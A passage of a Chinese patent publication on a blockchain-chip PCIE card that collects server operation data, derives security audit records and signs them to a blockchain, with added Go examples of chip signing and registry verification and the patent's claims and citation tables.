The obtained operation information may also include out-of-band information. The process and manner of obtaining out-of-band information are similar to those in step 21; see the description of step 21, which is not repeated here. In different embodiments, different types of out-of-band information may be obtained. In one embodiment, the out-of-band information may include one or more of: BIOS/BMC firmware version, OS version, hard disk capacity and number of hard disks, memory capacity and number of memory modules, motherboard serial number (SN), manufacturer and model, and power supply model and serial number.

The obtained operation information may also include the MAC address of the server. In one embodiment, the first PCIE card is a PCIE network card, and the blockchain chip can be connected to the main control chip. The MAC address of the PCIE network card (that is, the server's MAC address) and/or its serial number can then be obtained through the Media Independent Interface (MII) or Reduced Gigabit Media Independent Interface (RGMII) between the blockchain chip and the main control chip.

Then, in step 82, the operation information of the server is saved to the blockchain network.

In this step, the operation information is saved to the blockchain network, mainly to generate a certificate of the server asset status. In one embodiment, the certificate of the server asset status can be used for one or more of: registration, confirmation of ownership, evaluation, authentication, valuation, and custody of the server asset. The distributed nature and high data credibility of the blockchain network facilitate the trading and circulation of server assets, for example among multiple participants of the blockchain network.

Different types of blockchain may be used in different implementations, which this specification does not limit. In one embodiment, the blockchain chip stores a chip ID corresponding to the blockchain chip and a public-private key pair corresponding to that chip ID. The security audit information is signed with the private key of the pair to obtain a chip signature, and the security audit information and the chip signature are uploaded together to the blockchain network. In one example, the chip ID is a unique ID of the chip set before the chip leaves the factory.

The process and manner of uploading the operation information to the blockchain network are similar to those for uploading the audit information in step 23; see the description of step 23, which is not repeated here.
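The chip-side signing described for step 23 and reused here in step 82, together with the chip registration by chip ID, as an added example in Go that is not part of the patent: the chip stamps a record with its ID and signs it with the private key of the pair, and a registry on the network side accepts the upload only if that chip ID was registered and the signature verifies under the registered public key. Ed25519, the record layout, the registry type and every name in the block are assumptions; the patent fixes none of them.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/hex"
	"encoding/json"
	"errors"
	"fmt"
)

// AuditRecord is the security audit information of step 23: the audit result plus the operation information directly associated with it.
type AuditRecord struct {
	ChipID    string   `json:"chip_id"`
	AuditType string   `json:"audit_type"`
	Result    string   `json:"result"`
	Evidence  []string `json:"evidence,omitempty"` // e.g. the raw login records behind the result
	Timestamp int64    `json:"timestamp"`
}

// SignedUpload is what reaches the blockchain network: the record plus the chip signature over its JSON encoding (struct field order is fixed, so the encoding is canonical).
type SignedUpload struct {
	Record    AuditRecord `json:"record"`
	Signature string      `json:"signature"` // hex-encoded Ed25519 signature
}

// BlockchainChip models the card's chip: a factory-set chip ID and the key pair bound to it (Ed25519 is an assumption).
type BlockchainChip struct {
	ID   string
	Pub  ed25519.PublicKey
	priv ed25519.PrivateKey
}

// NewChip generates the pair locally; the page also allows negotiating it with the network.
func NewChip(id string) (*BlockchainChip, error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	return &BlockchainChip{ID: id, Pub: pub, priv: priv}, nil
}

// Sign stamps the record with the chip ID and signs it with the chip's private key.
func (c *BlockchainChip) Sign(rec AuditRecord) (SignedUpload, error) {
	rec.ChipID = c.ID
	msg, err := json.Marshal(rec)
	if err != nil {
		return SignedUpload{}, err
	}
	sig := ed25519.Sign(c.priv, msg)
	return SignedUpload{Record: rec, Signature: hex.EncodeToString(sig)}, nil
}

// Registry models the chain-side registration of chips by chip ID (claim 11).
type Registry struct{ keys map[string]ed25519.PublicKey }

func NewRegistry() *Registry { return &Registry{keys: map[string]ed25519.PublicKey{}} }

// Register binds a chip ID to a public key once; re-registration is refused so the binding cannot be overwritten later.
func (r *Registry) Register(id string, pub ed25519.PublicKey) error {
	if _, exists := r.keys[id]; exists {
		return fmt.Errorf("chip %s already registered", id)
	}
	r.keys[id] = pub
	return nil
}

// Verify is the check a node runs before writing an upload to the ledger: unknown chip IDs and bad signatures are rejected.
func (r *Registry) Verify(up SignedUpload) error {
	pub, ok := r.keys[up.Record.ChipID]
	if !ok {
		return errors.New("chip ID not registered")
	}
	sig, err := hex.DecodeString(up.Signature)
	if err != nil || len(sig) != ed25519.SignatureSize {
		return errors.New("malformed chip signature")
	}
	msg, err := json.Marshal(up.Record)
	if err != nil {
		return err
	}
	if !ed25519.Verify(pub, msg, sig) {
		return errors.New("chip signature does not verify")
	}
	return nil
}

func main() {
	chip, _ := NewChip("CHIP-0001") // constructed chip ID
	reg := NewRegistry()
	_ = reg.Register(chip.ID, chip.Pub)
	up, _ := chip.Sign(AuditRecord{AuditType: "os_login", Result: "malicious_login_detected"})
	fmt.Println("genuine upload:", reg.Verify(up))
	up.Record.Result = "no_malicious_login" // post-hoc edit of the stored result
	fmt.Println("tampered upload:", reg.Verify(up))
}
```

The same pair of functions serves step 82 with an operation-information record in place of the audit record.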

Another aspect of the embodiments of this specification further provides a PCIE card. FIG. 9 is a structural diagram of a PCIE card according to an embodiment of this specification. As shown in FIG. 9, the PCIE card 9000 includes a blockchain chip 910, and the blockchain chip includes a storage module 91, an information acquisition module 92, and an on-chain module 93, where:

the storage module 91 is configured to store the identity identifier of the blockchain chip;

the information acquisition module 92 is configured to obtain, when the PCIE card is installed in a server, the operation information of the server through a target interface;

the on-chain module 93 is configured to save server information to a blockchain network based on the identity identifier stored in the storage module, where the server information is obtained from the operation information.

In one embodiment, the PCIE card 900 further includes an audit module 94, configured to determine the security audit information of the server according to the operation information and to use the security audit information as the server information.

In one embodiment, the identity identifier may be a chip ID set at the factory for the blockchain chip, and the storage module may also store the public-private key pair of that chip ID for the blockchain network.

In one embodiment, the operating system (OS) of the server may have a built-in first agent program, and the information acquisition module may be further configured to:

obtain, over the PCIE bus, the in-band information of the server sent by the first agent program.

In one embodiment, the PCIE card may be a PCIE network card, the PCIE network card further including a main control chip, and the main control chip is connected to the blockchain chip through a switch chip.

In one embodiment, the server is further provided with a baseboard management controller (BMC), the PCIE network card is provided with a dedicated network port supporting the NCSI protocol, and the information acquisition module is further configured to:

obtain, through the dedicated network port, the out-of-band information of the server sent by the BMC.

In one embodiment, the information acquisition module may be further configured to:

obtain, through serial-over-LAN (SOL) redirection, the intermediate information of the server after startup but before the server OS starts.

In one embodiment, the information acquisition module may be further configured to:

obtain the network communication information of the server through the standard network port on the PCIE network card.

It should be understood that the terms "first", "second", and so on herein merely distinguish similar concepts for simplicity of description and have no other limiting effect.

Those skilled in the art should appreciate that, in one or more of the above examples, the functions described in the present invention may be implemented in hardware, software, firmware, or any combination thereof. When implemented in software, these functions may be stored on a computer-readable medium or transmitted as one or more instructions or code on a computer-readable medium.

The specific embodiments described above further describe the objectives, technical solutions, and beneficial effects of the present invention in detail. It should be understood that the above are only specific embodiments of the present invention and are not intended to limit its scope of protection; any modification, equivalent replacement, improvement, and so on made on the basis of the technical solution of the present invention shall fall within the scope of protection of the present invention.

Claims (30)

1. A server monitoring method, wherein the server is provided with a first PCIE card, the first PCIE card is provided with a blockchain chip, and the method is executed by the blockchain chip, the method comprising: obtaining the operation information of the server through a target interface; determining the security audit information of the server according to the operation information; and saving the security audit information to a blockchain network.

2. The method according to claim 1, wherein the operating system OS of the server has a built-in first agent program; obtaining the operation information of the server through the target interface comprises: obtaining the in-band information of the server from the first agent program through a first interface; and determining the security audit information of the server according to the operation information comprises: determining first audit information of the in-band information according to the in-band information.

3. The method according to claim 2, wherein the in-band information comprises one or more of: hardware information of the server, firmware/kernel version, server process information, port information, operating system boot information, user account information, crontab files, network firewall logs, and system logs; and the first audit information comprises one or more of: audit information on the server configuration, on port control, on network firewall operations, on the operating system boot process, on the server's multi-operating-system boot manager, on operating system logins, on application trusted measurement, on hard disk data input/output, and on kernel vulnerabilities.

4. The method according to claim 1, wherein the server is further provided with a baseboard management controller BMC; obtaining the operation information of the server through the target interface comprises: obtaining the out-of-band information of the server from the BMC through a second interface; and determining the security audit information of the server according to the operation information comprises: determining second audit information of the out-of-band information according to the out-of-band information.

5. The method according to claim 4, wherein the second interface is an interface supporting the NCSI protocol.

6. The method according to claim 4, wherein the out-of-band information comprises one or more of: out-of-band logs, out-of-band alarms, and out-of-band sensor information; and the second audit information comprises audit information on the health state of the server.

7. The method according to claim 1, wherein obtaining the operation information of the server through the target interface comprises: obtaining, through a third interface, the intermediate information of the server after startup but before the server OS starts, the third interface comprising a serial port or serial-over-LAN (SOL) redirection; and determining the security audit information of the server according to the operation information comprises: determining third audit information according to the intermediate information.

8. The method according to claim 1, wherein obtaining the operation information of the server through the target interface comprises: obtaining the network communication information of the server through a fourth interface, the fourth interface comprising a standard interface of a network card provided on the server; and determining the security audit information of the server according to the operation information comprises: determining fourth audit information related to network communication according to the network communication information.

9. The method according to claim 1, wherein the first PCIE card comprises one of a PCIE network card, a PCIE GPU card, or a PCIE HBA card.

10. The method according to claim 1, wherein the blockchain chip stores a chip ID corresponding to the blockchain chip and a public-private key pair corresponding to the chip ID; and saving the security audit information to the blockchain comprises: signing the security audit information with the private key of the public-private key pair to obtain a chip signature; and uploading the security audit information and the chip signature together to the blockchain network.

11. The method according to claim 10, further comprising, before uploading the security audit information and the chip signature together to the blockchain network: registering the blockchain chip on the blockchain network using the chip ID.

12. The method according to claim 10, wherein the public-private key pair corresponding to the chip ID is determined through negotiation with the blockchain network.

13. A server asset management method, wherein the server is provided with a first PCIE card, the first PCIE card is provided with a blockchain chip, and the method is executed by the blockchain chip, the method comprising: obtaining the operation information of the server through a target interface; and saving the operation information of the server to a blockchain network, where it is used to generate a certificate of the server asset status.

14. The method according to claim 13, wherein the operating system OS of the server has a built-in first agent program;
The method according to claim 13, wherein the operating system (OS) of the server has a built-in first agent program; 所述通过目标接口,获取所述服务器的运行信息,包括:The obtaining operation information of the server through the target interface includes: 通过第一接口,从所述第一代理程序获取服务器的带内信息。Through the first interface, the in-band information of the server is acquired from the first agent program. 15.根据权利要求14所述的方法,其中,所述带内信息包括:服务器使用时间、服务器上的应用的安装记录和使用记录中的一种或多种。15. The method of claim 14, wherein the in-band information comprises one or more of: server usage time, installation records and usage records of applications on the server. 16.根据权利要求13所述的方法,其中,所述服务器上还设置有基板管理控制器BMC,16. The method according to claim 13, wherein the server is further provided with a baseboard management controller BMC, 所述通过目标接口,获取所述服务器的运行信息,包括:The obtaining operation information of the server through the target interface includes: 通过第二接口,从BMC获取服务器的带外信息。Through the second interface, the out-of-band information of the server is obtained from the BMC. 17.根据权利要求16所述的方法,其中,所述第二接口为支持NCSI协议的接口。17. The method of claim 16, wherein the second interface is an interface supporting the NCSI protocol. 18.根据权利要求16所述的方法,其中,所述带外信息包括:bios/bmc fw版本、OS版本、硬盘容量/硬盘个数、内存容量/内存条数量、主板SN序列号/生产厂家/型号、电源型号/SN号中的一种或多种。18. The method according to claim 16, wherein the out-of-band information comprises: bios/bmc fw version, OS version, hard disk capacity/number of hard disks, memory capacity/number of memory sticks, mainboard SN serial number/manufacturer One or more of /model, power supply model/SN number. 19.根据权利要求13所述的方法,其中,所述第一PCIE卡为PCIE网卡,19. 
The method according to claim 13, wherein the first PCIE card is a PCIE network card, 所述通过目标接口,获取所述服务器的运行信息,包括:The obtaining operation information of the server through the target interface includes: 通过介质无关接口MII或简化吉比特介质无关接口RGMII,获取所述PCIE网卡的Mac地址和/或序列号。Obtain the Mac address and/or serial number of the PCIE network card through the medium independent interface MII or the simplified gigabit medium independent interface RGMII. 20.根据权利要求13所述的方法,其中,所述第一PCIE卡包括,PCIE网卡/PCIE GPU卡/PCIE HBA卡中的一种。20. The method of claim 13, wherein the first PCIE card comprises one of a PCIE network card/PCIE GPU card/PCIE HBA card. 21.根据权利要求21的方法,其中,所述芯片ID对应的公私钥对,通过与所述区块链网络的协商确定。21. The method according to claim 21, wherein the public-private key pair corresponding to the chip ID is determined through negotiation with the blockchain network. 22.根据权利要求13所述的方法,其中,所述服务器资产状态的凭证用于所述服务器资产的登记、确权、评估、鉴定、估值、托管中一项或多项。22. The method of claim 13, wherein the credential of the server asset state is used for one or more of registration, entitlement, appraisal, authentication, valuation, escrow of the server asset. 23.一种PCIE卡,包括区块链芯片,所述区块链芯片包括存储模块,信息获取模块,上链模块,其中,23. A PCIE card, comprising a blockchain chip, the blockchain chip comprising a storage module, an information acquisition module, and an uplink module, wherein, 所述存储模块用于存储所述区块链芯片的身份标识;The storage module is used to store the identity of the blockchain chip; 所述信息获取模块用于,在所述PCIE卡安装到服务器中时,通过目标接口,获取所述服务器的运行信息;The information acquisition module is used to acquire the operation information of the server through the target interface when the PCIE card is installed in the server; 所述上链模块用于,基于所述存储模块存储的身份标识,将服务器信息保存到区块链网络,其中所述服务器信息基于所述运行信息得到。The on-chain module is configured to save server information to the blockchain network based on the identity identifier stored by the storage module, wherein the server information is obtained based on the operation information. 24.根据权利要求23所述的PCIE卡,还包括,审核模块,用于根据所述运行信息,确定所述服务器的安全审核信息,以所述安全审核信息作为所述服务器信息。24. 
The PCIE card according to claim 23, further comprising an auditing module configured to determine security audit information of the server according to the operation information, and use the security audit information as the server information. 25.根据权利要求23所述的PCIE卡,其中,所述身份标识为所述区块链芯片出厂设置的芯片ID,所述存储模块还存储有该芯片ID对应于所述区块链网络的公私钥对。25. The PCIE card according to claim 23, wherein the identity identifier is a chip ID of the blockchain chip factory-set, and the storage module further stores the chip ID corresponding to the blockchain network. public-private key pair. 26.根据权利要求23所述的PCIE卡,其中,所述服务器的操作系统OS内置有第一代理程序,所述信息获取模块进一步用于:26. The PCIE card according to claim 23, wherein the operating system OS of the server has a built-in first agent program, and the information acquisition module is further used for: 通过PCIE总线,获取所述第一代理程序发送的所述服务器的带内信息。Obtain the in-band information of the server sent by the first agent program through the PCIE bus. 27.根据权利要求23所述的PCIE卡,其中,所述PCIE卡为PCIE网卡,所述PCIE网卡还包括主控芯片,所述主控芯片与所述区块链芯片通过交换芯片相连接。27. The PCIE card according to claim 23, wherein the PCIE card is a PCIE network card, the PCIE network card further comprises a main control chip, and the main control chip is connected to the blockchain chip through a switch chip. 28.根据权利要求27所述的PCIE卡,其中,所述服务器上还设置有基板管理控制器BMC,所述PCIE网卡设置有支持NCSI协议的专用网口,所述信息获取模块进一步用于:28. The PCIE card according to claim 27, wherein the server is further provided with a baseboard management controller (BMC), the PCIE network card is provided with a dedicated network port supporting the NCSI protocol, and the information acquisition module is further used for: 通过所述专用网口,获取所述BMC发送的所述服务器的带外信息。Obtain out-of-band information of the server sent by the BMC through the dedicated network port. 29.根据权利要求27所述的PCIE卡,其中,所述信息获取模块进一步用于:29. 
The PCIE card according to claim 27, wherein the information acquisition module is further used for: 通过串口重定向SOL,获取所述服务器在启动后、而服务器OS启动前的中间信息。The SOL is redirected through the serial port to obtain the intermediate information after the server is started but before the server OS is started. 30.根据权利要求27所述的PCIE卡,其中,所述信息获取模块进一步用于:30. The PCIE card according to claim 27, wherein the information acquisition module is further used for: 通过PCIE网卡上的标准网口,获取服务器的网络通信信息。Obtain the network communication information of the server through the standard network port on the PCIE network card.
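The chip-side flow of claims 2, 3, 10 and 11 end to end, as an added worked example that is not code from the patent or its assignee: an in-band snapshot handed over by the OS agent is reduced to one item of "first audit information" (a port-control verdict), the chip signs the canonical record with the private key tied to its chip ID, and the chain side accepts the record only if that chip ID is registered and the signature verifies over the audit bytes. The patent names no signature algorithm, serialization or audit rule, so Ed25519, JSON encoding and a listening-port allowlist are assumptions; the key pair is generated locally rather than negotiated with the network as claim 12 describes, and the snapshot, chip IDs and allowlist are constructed.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/hex"
	"encoding/json"
	"errors"
	"fmt"
)

// InBandInfo: the slice of claim 3's in-band information assumed here (hostname, listening ports).
type InBandInfo struct {
	Hostname       string `json:"hostname"`
	ListeningPorts []int  `json:"listening_ports"`
}

// AuditInfo: the "first audit information" derived from it, a port-control verdict plus its evidence.
type AuditInfo struct {
	Hostname        string `json:"hostname"`
	UnexpectedPorts []int  `json:"unexpected_ports"`
	Verdict         string `json:"verdict"`
}

// SignedRecord: what claim 10 uploads, the audit info together with chip ID and chip signature.
type SignedRecord struct {
	ChipID    string    `json:"chip_id"`
	Audit     AuditInfo `json:"audit"`
	Signature string    `json:"signature"`
}

// DeriveAudit applies one assumed rule: any listening port outside the allowlist is a violation.
func DeriveAudit(in InBandInfo, allowed map[int]bool) AuditInfo {
	var bad []int
	for _, p := range in.ListeningPorts {
		if !allowed[p] {
			bad = append(bad, p)
		}
	}
	verdict := "ok"
	if len(bad) > 0 {
		verdict = "port-policy-violation"
	}
	return AuditInfo{Hostname: in.Hostname, UnexpectedPorts: bad, Verdict: verdict}
}

// canonical gives signer and verifier identical bytes (encoding/json keeps struct field order).
func canonical(a AuditInfo) []byte {
	b, _ := json.Marshal(a) // cannot fail for this struct
	return b
}

// Chip models the blockchain chip: factory-set ID plus key pair (Ed25519 is an assumption).
type Chip struct {
	ID   string
	pub  ed25519.PublicKey
	priv ed25519.PrivateKey
}

func NewChip(id string) (*Chip, error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	return &Chip{ID: id, pub: pub, priv: priv}, nil
}

// Sign produces the chip signature over the canonical audit bytes.
func (c *Chip) Sign(a AuditInfo) SignedRecord {
	sig := ed25519.Sign(c.priv, canonical(a))
	return SignedRecord{ChipID: c.ID, Audit: a, Signature: hex.EncodeToString(sig)}
}

// Ledger models the chain side: the chip ID -> public key registry that claim 11's registration fills.
type Ledger map[string]ed25519.PublicKey
func (l Ledger) Register(c *Chip) { l[c.ID] = c.pub }

// Accept rejects records from unregistered chips and records altered after signing.
func (l Ledger) Accept(r SignedRecord) error {
	pub, ok := l[r.ChipID]
	if !ok {
		return errors.New("chip not registered: " + r.ChipID)
	}
	sig, err := hex.DecodeString(r.Signature)
	if err != nil || !ed25519.Verify(pub, canonical(r.Audit), sig) {
		return errors.New("chip signature does not verify")
	}
	return nil
}

func main() {
	chip, _ := NewChip("chip-0001") // constructed sample chip and snapshot, not real data
	ledger := Ledger{}
	ledger.Register(chip)
	rec := chip.Sign(DeriveAudit(InBandInfo{Hostname: "db-01", ListeningPorts: []int{22, 443, 4444}}, map[int]bool{22: true, 443: true}))
	fmt.Println(rec.Audit.Verdict, rec.Audit.UnexpectedPorts, ledger.Accept(rec))
	rec.Audit.Verdict = "ok" // alter after signing: the chain must now reject it
	fmt.Println(ledger.Accept(rec))
}
```

Two points a practitioner should keep in mind when reading the claims this way. The chip signature attests which chip produced the record and that it was not altered after signing; it says nothing about whether the in-band data was true, because that data arrives over the PCIE bus from an agent running inside the OS being audited, and a compromised OS can feed the chip whatever it likes. The out-of-band (BMC over NCSI) and pre-boot (SOL) paths of claims 4 to 7 do not pass through the host OS, which is what makes them useful as an independent cross-check. Canonical serialization also matters more than it looks: if the chain side re-encodes the audit fields in a different order, a valid signature fails to verify.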
CN202111479501.9A 2021-12-06 2021-12-06 Server monitoring method, asset management method and PCIE card Pending CN114780327A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202111479501.9A CN114780327A (en) 2021-12-06 2021-12-06 Server monitoring method, asset management method and PCIE card

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202111479501.9A CN114780327A (en) 2021-12-06 2021-12-06 Server monitoring method, asset management method and PCIE card

Publications (1)

Publication Number Publication Date
CN114780327A true CN114780327A (en) 2022-07-22

Family

ID=82423434

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202111479501.9A Pending CN114780327A (en) 2021-12-06 2021-12-06 Server monitoring method, asset management method and PCIE card

Country Status (1)

Country Link
CN (1) CN114780327A (en)

Citations (6)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101540694A (en) * 2008-03-17 2009-09-23 联想(北京)有限公司 Method for monitoring server and server adopting same
CN104363117A (en) * 2014-11-04 2015-02-18 浪潮电子信息产业股份有限公司 Method for realizing serial port redirection based on IPMI
CN110084069A (en) * 2019-04-17 2019-08-02 江苏全链通信息科技有限公司 Server log monitoring method and system based on block chain
CN110198347A (en) * 2019-05-21 2019-09-03 深圳前海微众银行股份有限公司 A kind of method for early warning and sub-control server based on block chain
CN111738859A (en) * 2020-07-08 2020-10-02 支付宝(杭州)信息技术有限公司 Block chain all-in-one machine and block chain network
CN112751729A (en) * 2020-12-30 2021-05-04 平安证券股份有限公司 Log monitoring method, device, medium and electronic equipment

Non-Patent Citations (3)

* Cited by examiner, † Cited by third party
Title
CSDN: "Introduction to trusted execution environments (TEE) and their application in the blockchain field", pages 1, Retrieved from the Internet <URL:https://blog.csdn.net/triaslab/article/details/102493292> *
SANGEETA SONI: "Verification of Integrity and Data Encryption (IDE) for PCIe Devices", pages 1 - 5, Retrieved from the Internet <URL:https://community.cadence.com/cadence_blogs_8/b/fv/posts/verification-of-integrity-and-data-encryption-ide-for-pcie-devices> *
SECURITY user: "The differences between TPM, TEE and SE", pages 1 - 2, Retrieved from the Internet <URL:https://cloud.tencent.com/developer/ask/sof/116741775> *

Cited By (2)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN115865522A (en) * 2023-02-10 2023-03-28 中航金网(北京)电子商务有限公司 Information transmission control method and device, electronic equipment and storage medium
CN115865522B (en) * 2023-02-10 2023-06-02 中航金网(北京)电子商务有限公司 Information transmission control method and device, electronic equipment and storage medium

Similar Documents

Publication Publication Date Title
US11258769B2 (en) Provisioning network keys to devices to allow them to provide their identity
US9866568B2 (en) Systems and methods for detecting and reacting to malicious activity in computer networks
CN107580767B (en) Method and system for managing network activities using biometrics
US10999246B2 (en) Locked down network interface
EP3405902B1 (en) Pattern matching based dataset extraction
US7900058B2 (en) Methods and arrangements for remote communications with a trusted platform module
TWI524204B (en) A method, apparatus, and system for manageability and secure routing and endpoint access
US11838195B2 (en) Deployable network sensor for multiple platforms
US9928359B1 (en) System and methods for providing security to an endpoint device
CN106341381A (en) Method and system for managing security keys of rack server system
US20160308886A1 (en) Preventing network attacks on baseboard management controllers
US20170331803A1 (en) Method for authenticating a networked endpoint using a physical (power) challenge
US9813439B2 (en) Evaluation node for reporting status via a secure link
US9762626B2 (en) System and method for as needed connection escalation
CN203968148U (en) A kind of network security management system with intrusion detection
JP2010263310A (en) Wireless communication device, wireless communication monitoring system, wireless communication method, and program
US8161558B2 (en) Network management and administration
US10326599B2 (en) Recovery agents and recovery plans over networks
CN114780327A (en) Server monitoring method, asset management method and PCIE card
US8667106B2 (en) Apparatus for blocking malware originating inside and outside an operating system
US20200329040A1 (en) System, apparatus and method for remotely authenticating peripheral devices
CN111031067A (en) Monitoring data transmission method and device of distributed system and electronic equipment
KR101425726B1 (en) Linked network security system and method based on virtualization in the separate network environment
CN108429727A (en) Method for secure exchange of discovery link information
Jaeger et al. Access control and data separation metrics in cloud infrastructures

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination